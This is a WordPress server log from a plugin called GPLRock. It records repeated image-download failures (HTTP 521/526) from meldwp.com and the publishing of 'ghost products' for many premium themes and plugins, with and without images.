download failed for product seline-creative-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 521, Error: . Retrying... [05-Apr-2026 05:00:07 UTC] GPLRock: Image download failed for product seline-creative-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 521, Error: . Retrying... [05-Apr-2026 05:00:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seline---creative-photography--portfolio-wordpress-theme-15501.webp for product seline-creative-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:00:09 UTC] GPLRock: Image download failed for product seline-creative-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:12 UTC] GPLRock: Image download failed for product seline-creative-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seline---creative-photography--portfolio-wordpress-theme-15501.webp for product seline-creative-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:00:14 UTC] GPLRock WARNING: Image download failed for product seline-creative-photography-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/seline---creative-photography--portfolio-wordpress-theme-15501.webp [05-Apr-2026 05:00:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: seline-creative-photography-portfolio-wordpress-theme [05-Apr-2026 05:00:14 UTC] GPLRock: Image download failed for product tritmix-fashion-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:16 UTC] GPLRock: Image download failed for product tritmix-fashion-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tritmix---fashion-elementor-woocommerce-theme-13495.webp for product tritmix-fashion-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:00:18 UTC] GPLRock: Image download failed for product tritmix-fashion-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:20 UTC] GPLRock: Image download failed for product tritmix-fashion-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tritmix---fashion-elementor-woocommerce-theme-13495.webp for product tritmix-fashion-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:00:22 UTC] GPLRock WARNING: Image download failed for product tritmix-fashion-elementor-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/tritmix---fashion-elementor-woocommerce-theme-13495.webp [05-Apr-2026 05:00:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tritmix-fashion-elementor-woocommerce-theme [05-Apr-2026 05:00:22 UTC] GPLRock: Image downloaded successfully for product cocco-kids-store-and-baby-shop-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d884b020.webp [05-Apr-2026 05:00:22 UTC] GPLRock: Using pre-downloaded image for product cocco-kids-store-and-baby-shop-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d884b020.webp [05-Apr-2026 05:00:22 UTC] GPLRock: Ghost product published with image - Product ID: cocco-kids-store-and-baby-shop-wordpress-theme [05-Apr-2026 05:00:23 UTC] GPLRock: Image download failed for product tripzia-immigration-consulting-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:25 UTC] GPLRock: Image download failed for product tripzia-immigration-consulting-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tripzia--immigration-consulting-wordpress-theme--rtl-17372.webp for product tripzia-immigration-consulting-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:00:27 UTC] GPLRock: Image download failed for product tripzia-immigration-consulting-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:29 UTC] GPLRock: Image download failed for product tripzia-immigration-consulting-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tripzia--immigration-consulting-wordpress-theme--rtl-17372.webp for product tripzia-immigration-consulting-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:00:31 UTC] GPLRock WARNING: Image download failed for product tripzia-immigration-consulting-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/tripzia--immigration-consulting-wordpress-theme--rtl-17372.webp [05-Apr-2026 05:00:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tripzia-immigration-consulting-wordpress-theme-rtl [05-Apr-2026 05:00:31 UTC] GPLRock: Image download failed for product mono-multi-purpose-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:33 UTC] GPLRock: Image download failed for product mono-multi-purpose-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mono---multi-purpose-html5-template-9036.webp for product mono-multi-purpose-html5-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:00:35 UTC] GPLRock: Image download failed for product mono-multi-purpose-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:38 UTC] GPLRock: Image download failed for product mono-multi-purpose-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mono---multi-purpose-html5-template-9036.webp for product mono-multi-purpose-html5-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:00:40 UTC] GPLRock WARNING: Image download failed for product mono-multi-purpose-html5-template. URL: https://meldwp.com/wp-content/uploads/mono---multi-purpose-html5-template-9036.webp [05-Apr-2026 05:00:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mono-multi-purpose-html5-template [05-Apr-2026 05:00:40 UTC] GPLRock: Image download failed for product droow-ajax-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:42 UTC] GPLRock: Image download failed for product droow-ajax-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/droow---ajax-portfolio-wordpress-theme-4930.webp for product droow-ajax-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:00:44 UTC] GPLRock: Image download failed for product droow-ajax-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:46 UTC] GPLRock: Image download failed for product droow-ajax-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/droow---ajax-portfolio-wordpress-theme-4930.webp for product droow-ajax-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:00:48 UTC] GPLRock WARNING: Image download failed for product droow-ajax-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/droow---ajax-portfolio-wordpress-theme-4930.webp [05-Apr-2026 05:00:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: droow-ajax-portfolio-wordpress-theme [05-Apr-2026 05:00:48 UTC] GPLRock: Image download failed for product majed-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:51 UTC] GPLRock: Image download failed for product majed-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/majed---business-consulting-wordpress-theme-506.webp for product majed-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:00:53 UTC] GPLRock: Image download failed for product majed-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:55 UTC] GPLRock: Image download failed for product majed-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/majed---business-consulting-wordpress-theme-506.webp for product majed-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:00:57 UTC] GPLRock WARNING: Image download failed for product majed-business-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/majed---business-consulting-wordpress-theme-506.webp [05-Apr-2026 05:00:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: majed-business-consulting-wordpress-theme [05-Apr-2026 05:00:57 UTC] GPLRock: Image download failed for product god-grace-church-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:59 UTC] GPLRock: Image download failed for product god-grace-church-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:01:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/god-grace-church-wordpress-theme-11729.webp for product god-grace-church-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:01:02 UTC] GPLRock: Image download failed for product god-grace-church-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:01:04 UTC] GPLRock: Image download failed for product god-grace-church-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:01:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/god-grace-church-wordpress-theme-11729.webp for product god-grace-church-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:01:06 UTC] GPLRock WARNING: Image download failed for product god-grace-church-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/god-grace-church-wordpress-theme-11729.webp [05-Apr-2026 05:01:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: god-grace-church-wordpress-theme [05-Apr-2026 05:01:48 UTC] GPLRock: Image downloaded successfully for product pathwell-a-senior-care-hospital-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d956e2c7.png [05-Apr-2026 05:01:48 UTC] GPLRock: Using pre-downloaded image for product pathwell-a-senior-care-hospital-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d956e2c7.png [05-Apr-2026 05:01:48 UTC] GPLRock: Ghost product published with image - Product ID: pathwell-a-senior-care-hospital-wordpress-theme [05-Apr-2026 05:01:50 UTC] GPLRock: Image downloaded successfully for product astro-photography-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ac093adf.jpg [05-Apr-2026 05:01:50 UTC] GPLRock: Using pre-downloaded image for product astro-photography-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ac093adf.jpg [05-Apr-2026 05:01:50 UTC] GPLRock: Ghost product published with image - Product ID: astro-photography-wordpress-theme [05-Apr-2026 05:01:51 UTC] GPLRock: Image downloaded successfully for product antomi-multipurpose-theme-for-woocommerce-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d5b14e53.jpg [05-Apr-2026 05:01:51 UTC] GPLRock: Using pre-downloaded image for product antomi-multipurpose-theme-for-woocommerce-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d5b14e53.jpg [05-Apr-2026 05:01:51 UTC] GPLRock: Ghost product published with image - Product ID: antomi-multipurpose-theme-for-woocommerce-wordpress [05-Apr-2026 05:01:53 UTC] GPLRock: Image downloaded successfully for product youtube-vimeo-video-player-and-slider-wp-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-038dab71.jpg [05-Apr-2026 05:01:53 UTC] GPLRock: Using pre-downloaded image for product youtube-vimeo-video-player-and-slider-wp-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-038dab71.jpg [05-Apr-2026 05:01:53 UTC] GPLRock: Ghost product published with image - Product ID: youtube-vimeo-video-player-and-slider-wp-plugin [05-Apr-2026 05:01:55 UTC] GPLRock: Image downloaded successfully for product recibo-restaurant-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-64989e15.jpg [05-Apr-2026 05:01:55 UTC] GPLRock: Using pre-downloaded image for product recibo-restaurant-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-64989e15.jpg [05-Apr-2026 05:01:55 UTC] GPLRock: Ghost product published with image - Product ID: recibo-restaurant-wordpress [05-Apr-2026 05:01:57 UTC] GPLRock: Image downloaded successfully for product amp-gravity-forms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e9182c74.png [05-Apr-2026 05:01:57 UTC] GPLRock: Using pre-downloaded image for product amp-gravity-forms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e9182c74.png [05-Apr-2026 05:01:57 UTC] GPLRock: Ghost product published with image - Product ID: amp-gravity-forms [05-Apr-2026 05:01:59 UTC] GPLRock: Image downloaded successfully for product alit-minimalist-responsive-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e79b466d.jpg [05-Apr-2026 05:01:59 UTC] GPLRock: Using pre-downloaded image for product alit-minimalist-responsive-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e79b466d.jpg [05-Apr-2026 05:01:59 UTC] GPLRock: Ghost product published with image - Product ID: alit-minimalist-responsive-woocommerce-wordpress-theme [05-Apr-2026 05:02:01 UTC] GPLRock: Image downloaded successfully for product xpertiz-wordpress-theme-for-advisors-and-experts (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d6d1901f.jpg [05-Apr-2026 05:02:01 UTC] GPLRock: Using pre-downloaded image for product xpertiz-wordpress-theme-for-advisors-and-experts: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d6d1901f.jpg [05-Apr-2026 05:02:01 UTC] GPLRock: Ghost product published with image - Product ID: xpertiz-wordpress-theme-for-advisors-and-experts [05-Apr-2026 05:02:02 UTC] GPLRock: Image downloaded successfully for product divinity-church-nonprofit-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b967fde3.jpg [05-Apr-2026 05:02:03 UTC] GPLRock: Using pre-downloaded image for product divinity-church-nonprofit-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b967fde3.jpg [05-Apr-2026 05:02:03 UTC] GPLRock: Ghost product published with image - Product ID: divinity-church-nonprofit-wordpress-theme [05-Apr-2026 05:12:05 UTC] GPLRock: Image downloaded successfully for product kaskad-city-guide-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7ff792be.webp [05-Apr-2026 05:12:05 UTC] GPLRock: Using pre-downloaded image for product kaskad-city-guide-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7ff792be.webp [05-Apr-2026 05:12:05 UTC] GPLRock: Ghost product published with image - Product ID: kaskad-city-guide-wordpress-theme [05-Apr-2026 05:12:05 UTC] GPLRock: Image download failed for product mykd-esports-and-gaming-nft-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:12:07 UTC] GPLRock: Image download failed for product mykd-esports-and-gaming-nft-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:12:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mykd---esports-and-gaming-nft-wordpress-theme-700.webp for product mykd-esports-and-gaming-nft-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:12:09 UTC] GPLRock: Image download failed for product mykd-esports-and-gaming-nft-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:12:11 UTC] GPLRock: Image download failed for product mykd-esports-and-gaming-nft-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:12:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mykd---esports-and-gaming-nft-wordpress-theme-700.webp for product mykd-esports-and-gaming-nft-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:12:13 UTC] GPLRock WARNING: Image download failed for product mykd-esports-and-gaming-nft-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mykd---esports-and-gaming-nft-wordpress-theme-700.webp [05-Apr-2026 05:12:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mykd-esports-and-gaming-nft-wordpress-theme [05-Apr-2026 05:12:14 UTC] GPLRock: Image download failed for product vihara-ashram-oriental-buddhist-temple-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:12:16 UTC] GPLRock: Image download failed for product vihara-ashram-oriental-buddhist-temple-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:12:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vihara--ashram-oriental-buddhist-temple-wordpress-theme--rtl-1702.webp for product vihara-ashram-oriental-buddhist-temple-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:12:18 UTC] GPLRock: Image download failed for product vihara-ashram-oriental-buddhist-temple-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:12:20 UTC] GPLRock: Image download failed for product vihara-ashram-oriental-buddhist-temple-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:12:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vihara--ashram-oriental-buddhist-temple-wordpress-theme--rtl-1702.webp for product vihara-ashram-oriental-buddhist-temple-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:12:22 UTC] GPLRock WARNING: Image download failed for product vihara-ashram-oriental-buddhist-temple-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/vihara--ashram-oriental-buddhist-temple-wordpress-theme--rtl-1702.webp [05-Apr-2026 05:12:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vihara-ashram-oriental-buddhist-temple-wordpress-theme-rtl [05-Apr-2026 05:12:22 UTC] GPLRock: Image download failed for product cryptcon-ico-nft-and-crypto-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:22:33 UTC] GPLRock: Image downloaded successfully for product stockholm-a-genuinely-multi-concept-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-27248066.jpg [05-Apr-2026 05:22:33 UTC] GPLRock: Using pre-downloaded image for product stockholm-a-genuinely-multi-concept-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-27248066.jpg [05-Apr-2026 05:22:33 UTC] GPLRock: Ghost product published with image - Product ID: stockholm-a-genuinely-multi-concept-theme [05-Apr-2026 05:22:35 UTC] GPLRock: Image downloaded successfully for product sober-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a08c4de0.jpg [05-Apr-2026 05:22:35 UTC] GPLRock: Using pre-downloaded image for product sober-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a08c4de0.jpg [05-Apr-2026 05:22:35 UTC] GPLRock: Ghost product published with image - Product ID: sober-woocommerce-wordpress-theme [05-Apr-2026 05:22:36 UTC] GPLRock: Image downloaded successfully for product advanced-custom-fields-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-809256b0.jpg [05-Apr-2026 05:22:36 UTC] GPLRock: Using pre-downloaded image for product advanced-custom-fields-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-809256b0.jpg [05-Apr-2026 05:22:36 UTC] GPLRock: Ghost product published with image - Product ID: advanced-custom-fields-for-woocommerce [05-Apr-2026 05:22:38 UTC] GPLRock: Image downloaded successfully for product popup-maker-advanced-theme-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a5895463.jpg [05-Apr-2026 05:22:38 UTC] GPLRock: Using pre-downloaded image for product popup-maker-advanced-theme-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a5895463.jpg [05-Apr-2026 05:22:38 UTC] GPLRock: Ghost product published with image - Product ID: popup-maker-advanced-theme-builder [05-Apr-2026 05:22:39 UTC] GPLRock: Image downloaded successfully for product mainwp-sucuri-extension (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b5d2b590.jpg [05-Apr-2026 05:22:39 UTC] GPLRock: Using pre-downloaded image for product mainwp-sucuri-extension: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b5d2b590.jpg [05-Apr-2026 05:22:39 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-sucuri-extension [05-Apr-2026 05:22:41 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-featured-audio-video-content-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-461f8527.jpg [05-Apr-2026 05:22:41 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-featured-audio-video-content-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-461f8527.jpg [05-Apr-2026 05:22:41 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-featured-audio-video-content-premium [05-Apr-2026 05:22:42 UTC] GPLRock: Image downloaded successfully for product wp-online-contract (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-93d4cf57.jpg [05-Apr-2026 05:22:42 UTC] GPLRock: Using pre-downloaded image for product wp-online-contract: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-93d4cf57.jpg [05-Apr-2026 05:22:42 UTC] GPLRock: Ghost product published with image - Product ID: wp-online-contract [05-Apr-2026 05:22:44 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-compare-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b8044174.jpg [05-Apr-2026 05:22:44 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-compare-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b8044174.jpg [05-Apr-2026 05:22:44 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-compare-premium [05-Apr-2026 05:22:46 UTC] GPLRock: Image downloaded successfully for product entrepreneur-booking-for-small-businesses (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-94c31488.jpg [05-Apr-2026 05:22:46 UTC] GPLRock: Using pre-downloaded image for product entrepreneur-booking-for-small-businesses: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-94c31488.jpg [05-Apr-2026 05:22:46 UTC] GPLRock: Ghost product published with image - Product ID: entrepreneur-booking-for-small-businesses [05-Apr-2026 05:22:47 UTC] GPLRock: Image downloaded successfully for product the-events-calendar-community-events (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3d945882.jpg [05-Apr-2026 05:22:47 UTC] GPLRock: Using pre-downloaded image for product the-events-calendar-community-events: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3d945882.jpg [05-Apr-2026 05:22:47 UTC] GPLRock: Ghost product published with image - Product ID: the-events-calendar-community-events [05-Apr-2026 05:23:36 UTC] GPLRock: Image download failed for product otello-personal-blog-and-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:23:38 UTC] GPLRock: Image download failed for product otello-personal-blog-and-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:23:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/otello---personal-blog-and-magazine-wordpress-theme-27962.webp for product otello-personal-blog-and-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:23:40 UTC] GPLRock: Image download failed for product otello-personal-blog-and-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:23:42 UTC] GPLRock: Image download failed for product otello-personal-blog-and-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:23:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/otello---personal-blog-and-magazine-wordpress-theme-27962.webp for product otello-personal-blog-and-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:23:44 UTC] GPLRock WARNING: Image download failed for product otello-personal-blog-and-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/otello---personal-blog-and-magazine-wordpress-theme-27962.webp [05-Apr-2026 05:23:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: otello-personal-blog-and-magazine-wordpress-theme [05-Apr-2026 05:23:44 UTC] GPLRock: Image download failed for product greenskeeper-gardening-landscaping-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:23:46 UTC] GPLRock: Image download failed for product greenskeeper-gardening-landscaping-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:23:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/greenskeeper---gardening--landscaping-responsive-wordpress-theme-31361.webp for product greenskeeper-gardening-landscaping-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:23:49 UTC] GPLRock: Image download failed for product greenskeeper-gardening-landscaping-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:23:51 UTC] GPLRock: Image download failed for product greenskeeper-gardening-landscaping-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:23:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/greenskeeper---gardening--landscaping-responsive-wordpress-theme-31361.webp for product greenskeeper-gardening-landscaping-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:23:53 UTC] GPLRock WARNING: Image download failed for product greenskeeper-gardening-landscaping-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/greenskeeper---gardening--landscaping-responsive-wordpress-theme-31361.webp [05-Apr-2026 05:23:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: greenskeeper-gardening-landscaping-responsive-wordpress-theme [05-Apr-2026 05:23:53 UTC] GPLRock: Image downloaded successfully for product transpress-ultimate-transport-logistics-warehouse-wp-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b6e3bba6.webp [05-Apr-2026 05:23:53 UTC] GPLRock: Using pre-downloaded image for product transpress-ultimate-transport-logistics-warehouse-wp-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b6e3bba6.webp [05-Apr-2026 05:23:53 UTC] GPLRock: Ghost product published with image - Product ID: transpress-ultimate-transport-logistics-warehouse-wp-theme [05-Apr-2026 05:23:53 UTC] GPLRock: Image download failed for product growler-brewery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:23:55 UTC] GPLRock: Image download failed for product growler-brewery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:23:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/growler---brewery-wordpress-theme-9164.webp for product growler-brewery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:23:57 UTC] GPLRock: Image download failed for product growler-brewery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:23:59 UTC] GPLRock: Image download failed for product growler-brewery-wordpress-theme (attempt 2/3). 